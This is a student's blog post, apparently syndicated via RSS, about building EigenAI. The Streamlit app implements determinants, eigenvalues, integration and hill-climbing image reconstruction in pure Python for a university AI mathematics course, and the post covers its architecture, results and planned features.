&lt;p&gt;&lt;strong&gt;Total Duration:&lt;/strong&gt; 12 weeks of intensive mathematical foundations for AI&lt;/p&gt;




&lt;h2&gt;
  
  
  🏗️ Technical Architecture
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Streamlit&lt;/td&gt;
&lt;td&gt;Interactive UI with zero JavaScript&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Core Logic&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure Python 3.10+&lt;/td&gt;
&lt;td&gt;Type-hinted, no NumPy in algorithms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Math Rendering&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SymPy + matplotlib&lt;/td&gt;
&lt;td&gt;LaTeX-quality equations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Streamlit Cloud&lt;/td&gt;
&lt;td&gt;One-click deploy from GitHub&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Version Control&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Git + GitHub&lt;/td&gt;
&lt;td&gt;Full project history since commit 1&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Why Pure Python for Core Logic?&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;The assessment required implementing algorithms &lt;strong&gt;without numerical libraries&lt;/strong&gt; to demonstrate understanding of the underlying math. This constraint forced me to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Write cofactor expansion from scratch (not just &lt;code&gt;np.linalg.det()&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Implement Simpson's Rule manually (not just &lt;code&gt;scipy.integrate.quad()&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Build hill climbing with custom neighbor generation (not just &lt;code&gt;scipy.optimize.minimize()&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Result:&lt;/strong&gt; Deep understanding of how these algorithms actually work under the hood.&lt;/p&gt;




&lt;h2&gt;
  
  
  🗝️ Key Features &amp;amp; Lessons Learned
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;1. Modular Architecture That Scales&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;eigenai/
├── app.py                    # Main Streamlit entry point
├── views/                    # UI components (one per assessment)
│   ├── set1Problem1.py      # Determinants UI
│   ├── set1Problem2.py      # Eigenvalues UI
│   ├── set2Problem1.py      # Integration UI
│   ├── set2Problem2.py      # RRBF UI
│   └── set3Problem1.py      # Hill Climbing UI
└── resolvers/                # Pure Python algorithms
    ├── determinant.py
    ├── eigen_solver.py
    ├── integrals.py
    ├── rrbf.py
    ├── hill_climber.py
    └── constructor.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Lesson Learned:&lt;/strong&gt; Separating algorithm logic from UI made testing 10x easier. When debugging the cost function, the UI stayed unchanged. When improving visualizations, the core math stayed untouched.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Iterative Development:&lt;/strong&gt; EigenAI evolved through 23+ versions:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Milestone&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;v0.0.1&lt;/td&gt;
&lt;td&gt;Streamlit setup, assets, pages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v0.1.0&lt;/td&gt;
&lt;td&gt;✅ Assessment 2A submission&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v0.1.8&lt;/td&gt;
&lt;td&gt;Added Hill Climbing Binary Image Reconstruction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v0.2.0&lt;/td&gt;
&lt;td&gt;✅ Assessment 2B submission (Integration + RRBF)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v0.2.4&lt;/td&gt;
&lt;td&gt;Added stochastic sampling to Hill Climber&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v0.2.6&lt;/td&gt;
&lt;td&gt;Added complex pattern selector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v0.3.0&lt;/td&gt;
&lt;td&gt;✅ Assessment 3 submission (Hill Climbing Algorithm)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;Each assessment pushed the app forward—turning coursework into production-ready features. Detailed &lt;a href="https://github.com/lfariabr/eigenAi/blob/master/docs/changelog.md" rel="noopener noreferrer"&gt;&lt;code&gt;CHANGELOG.md&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;2. Hill Climbing: When "Good Enough" Is Good Enough&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;The most fascinating part was implementing &lt;strong&gt;Hill Climbing&lt;/strong&gt; for image reconstruction:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Problem:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Start with a random 10×10 binary image (noise)&lt;/li&gt;
&lt;li&gt;Target: A circle pattern (100 pixels to match)&lt;/li&gt;
&lt;li&gt;Cost function: Hamming distance (count mismatched pixels)&lt;/li&gt;
&lt;li&gt;Neighborhood: Flip one pixel at a time (100 neighbors per state)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Algorithm:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;iterations&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;max_iterations&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;neighbors&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generate_all_100_neighbors&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;current_state&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;best_neighbor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;min&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;neighbors&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;cost_function&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;cost&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;best_neighbor&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="nf"&gt;cost&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;current_state&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;  &lt;span class="c1"&gt;# Stuck at local optimum
&lt;/span&gt;
    &lt;span class="n"&gt;current_state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;best_neighbor&lt;/span&gt;
    &lt;span class="n"&gt;iterations&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Results:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simple pattern (circle): &lt;strong&gt;100% success rate&lt;/strong&gt;, avg 147 iterations&lt;/li&gt;
&lt;li&gt;Complex pattern (checkerboard): &lt;strong&gt;85% success rate&lt;/strong&gt;, gets stuck in local optima&lt;/li&gt;
&lt;li&gt;Stochastic sampling (50 neighbors): &lt;strong&gt;95% success&lt;/strong&gt;, 2x faster&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Insight:&lt;/strong&gt; Hill climbing works beautifully on smooth cost landscapes but fails on complex ones.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This limitation explains why modern AI uses:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Simulated annealing&lt;/strong&gt; — allows temporary cost increases (probabilistic acceptance)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Genetic algorithms&lt;/strong&gt; — explores multiple paths simultaneously (population-based)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gradient descent with momentum&lt;/strong&gt; — escapes shallow local minima (velocity-based)&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;3. Stochastic Sampling: The Speed vs. Accuracy Trade-Off&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;One enhancement I added beyond requirements was &lt;strong&gt;stochastic hill climbing&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;Instead of evaluating all 100 neighbors, randomly sample 50.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trade-offs:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;⚡ &lt;strong&gt;Speed:&lt;/strong&gt; 2x faster per iteration&lt;/li&gt;
&lt;li&gt;⚠️ &lt;strong&gt;Accuracy:&lt;/strong&gt; May miss optimal move 5% of the time&lt;/li&gt;
&lt;li&gt;📊 &lt;strong&gt;Final cost:&lt;/strong&gt; Avg 0.5 pixels worse than full evaluation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world application:&lt;/strong&gt; When you have 10,000 neighbors (e.g., 100×100 image), evaluating all is impractical. Stochastic sampling becomes mandatory.&lt;/p&gt;




&lt;h2&gt;
  
  
  KPIs
&lt;/h2&gt;

&lt;p&gt;For the hill climbing implementation, I tracked:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Simple Pattern&lt;/th&gt;
&lt;th&gt;Complex Pattern&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Initial Cost&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~50 mismatched pixels&lt;/td&gt;
&lt;td&gt;~50 mismatched pixels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Final Cost&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;0 (perfect)&lt;/td&gt;
&lt;td&gt;0-8 (may get stuck)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Iterations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~147&lt;/td&gt;
&lt;td&gt;~500 (hits plateau limit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&amp;lt;0.03s&lt;/td&gt;
&lt;td&gt;&amp;lt;0.2s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Neighbors Evaluated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~14,700&lt;/td&gt;
&lt;td&gt;~50,000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Success Rate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;100%&lt;/td&gt;
&lt;td&gt;85%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Key Takeaway:&lt;/strong&gt; Problem structure matters more than algorithm sophistication. A simple greedy search beats complex methods on convex problems.&lt;/p&gt;




&lt;h2&gt;
  
  
  💥 Insights
&lt;/h2&gt;

&lt;p&gt;This project transformed my understanding of AI math:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;"Eigenvalues are λ where det(A - λI) = 0" (memorized formula)&lt;/td&gt;
&lt;td&gt;Built cofactor expansion recursively, &lt;strong&gt;saw&lt;/strong&gt; how determinants break down&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Gradient descent minimizes loss" (vague intuition)&lt;/td&gt;
&lt;td&gt;Computed RRBF gradients by hand, &lt;strong&gt;felt&lt;/strong&gt; the chain rule propagate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Hill climbing gets stuck in local optima" (heard in lectures)&lt;/td&gt;
&lt;td&gt;Watched hill climbing fail on checkerboards, &lt;strong&gt;understood&lt;/strong&gt; why cost landscape matters&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;This transformation from abstract concepts to concrete understanding has fundamentally changed how I approach AI problems: I now see the math not as a collection of formulas, but as a toolkit of interconnected ideas that I can manipulate and reason about directly.&lt;/p&gt;

&lt;p&gt;The hands-on experience has given me a deep, intuitive grasp of the mathematical foundations that underpin modern AI, enabling me to approach complex problems with both confidence and clarity, and to think about optimization and machine learning as &lt;strong&gt;algorithms to apply&lt;/strong&gt; and &lt;strong&gt;mathematical principles&lt;/strong&gt; that I can understand and leverage in practice.&lt;/p&gt;




&lt;h2&gt;
  
  
  ❓ What's Next for EigenAI?
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Module 6 introduced three optimization paradigms:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ &lt;strong&gt;Hill Climbing&lt;/strong&gt; (implemented in Assessment 3)&lt;/li&gt;
&lt;li&gt;🕐 &lt;strong&gt;Simulated Annealing&lt;/strong&gt; (probabilistic escape from local optima)&lt;/li&gt;
&lt;li&gt;🕐 &lt;strong&gt;Genetic Algorithms&lt;/strong&gt; (population-based evolutionary search)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Upcoming v0.4.X+ features:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enhanced Optimization Suite:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simulated Annealing comparison (temperature schedules, acceptance probability)&lt;/li&gt;
&lt;li&gt;Genetic Algorithm variant (crossover, mutation, selection operators)&lt;/li&gt;
&lt;li&gt;A* Search for pathfinding (admissible heuristics)&lt;/li&gt;
&lt;li&gt;Q-Learning demo (reinforcement learning basics)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Platform Enhancements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Authentication&lt;/strong&gt; — user login and progress tracking&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM Integration&lt;/strong&gt; — GPT-4 powered step-by-step explanations with rate limiting&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom Agent Framework&lt;/strong&gt; — Built from the ground-up using knowledge graphs and reasoning for problem-solving&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supabase BaaS&lt;/strong&gt; — cloud storage for user data and solutions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Backend Framework&lt;/strong&gt; — FastAPI or Flask for RESTful API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Weekly Digest&lt;/strong&gt; — agentic integration for learning analytics&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test Coverage&lt;/strong&gt; — comprehensive unit testing with pytest&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Enhancements&lt;/strong&gt; — input sanitization, HTTPS enforcement&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;If you want to explore EigenAI:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;🌍 Live Demo:&lt;/strong&gt; &lt;a href="https://eigen-ai.streamlit.app/" rel="noopener noreferrer"&gt;eigen-ai.streamlit.app&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set1Problem1/MFA501_Assessment2_Set1Problem1_report_Faria_Luis.pdf" rel="noopener noreferrer"&gt;Assessment 2A, S1P1, Determinants, Reflective Report&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📹 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set1Problem1/MFA501_Assessment2_Set1Problem1_video_Faria_Luis.mp4" rel="noopener noreferrer"&gt;Assessment 2A, S1P1, Determinants, Video Demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set1Problem2/MFA501_Assessment2_Set1Problem2_report_Faria_Luis.pdf" rel="noopener noreferrer"&gt;Assessment 2A, S1P2, Eigenvalues, Reflective Report&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📹 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set1Problem2/MFA501_Assessment2_Set1Problem2_video_Faria_Luis.mp4" rel="noopener noreferrer"&gt;Assessment 2A, S1P2, Eigenvalues, Video Demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set2Problem1/MFA501_Assessment2B_Set1_report_Faria_Luis.pdf" rel="noopener noreferrer"&gt;Assessment 2B, S2P1, Integrals, Reflective Report&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📹 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set2Problem1/MFA501_Assessment2B_Set1_demo_Faria_Luis.mp4" rel="noopener noreferrer"&gt;Assessment 2B, S2P1, Integrals, Video Demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set2Problem2/MFA501_Assessment2B_Set2_report_Faria_Luis.pdf" rel="noopener noreferrer"&gt;Assessment 2B, S2P2, RRBF, Reflective Report&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📹 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment2/Set2Problem2/MFA501_Assessment2B_Set2_demo_Faria_Luis.mp4" rel="noopener noreferrer"&gt;Assessment 2B, S2P2, RRBF, Video Demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment3/Set3Problem1/MFA501_Assessment3_report_Faria_Luis.pdf" rel="noopener noreferrer"&gt;Assessment 3, Hill Climbing, Reflective Report&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📹 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-MFA/assignments/Assessment3/Set3Problem1/MFA501_Assessment3_demo_Faria_Luis.mp4" rel="noopener noreferrer"&gt;Assessment 3, Hill Climbing, Video Demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🤖 &lt;a href="https://github.com/lfariabr/eigenAi/tree/master" rel="noopener noreferrer"&gt;EigenAi Source Code&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Let's Connect!
&lt;/h2&gt;

&lt;p&gt;Building EigenAI has been the perfect bridge between mathematical theory and practical software engineering. If you're:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Learning AI/ML foundations&lt;/li&gt;
&lt;li&gt;Building educational tools&lt;/li&gt;
&lt;li&gt;Passionate about making math accessible&lt;/li&gt;
&lt;li&gt;Interested in optimization algorithms&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I’d love to connect:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  References &amp;amp; Further Reading
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Academic Sources:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Strang, G. (2016). &lt;em&gt;Introduction to linear algebra&lt;/em&gt; (5th ed.). Wellesley-Cambridge Press.&lt;/li&gt;
&lt;li&gt;Goodfellow, I., Bengio, Y., &amp;amp; Courville, A. (2016). &lt;em&gt;Deep learning&lt;/em&gt;. MIT Press.&lt;/li&gt;
&lt;li&gt;Nocedal, J., &amp;amp; Wright, S. (2006). &lt;em&gt;Numerical optimization&lt;/em&gt;. Springer.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Project Tech:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.streamlit.io/" rel="noopener noreferrer"&gt;Streamlit Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.sympy.org/" rel="noopener noreferrer"&gt;SymPy Symbolic Math&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0484/" rel="noopener noreferrer"&gt;Python Type Hints (PEP 484)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Tags:&lt;/strong&gt; #machinelearning #python #streamlit #ai #mathematics #optimization #hillclimbing #education&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Built with ☕ and calculus by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Student @ Torrens University Australia | MFA501 | Dec 2025&lt;/em&gt;&lt;/p&gt;

</description>
      <category>machinelearning</category>
      <category>python</category>
      <category>ai</category>
      <category>ui</category>
    </item>
  </channel>
</rss>
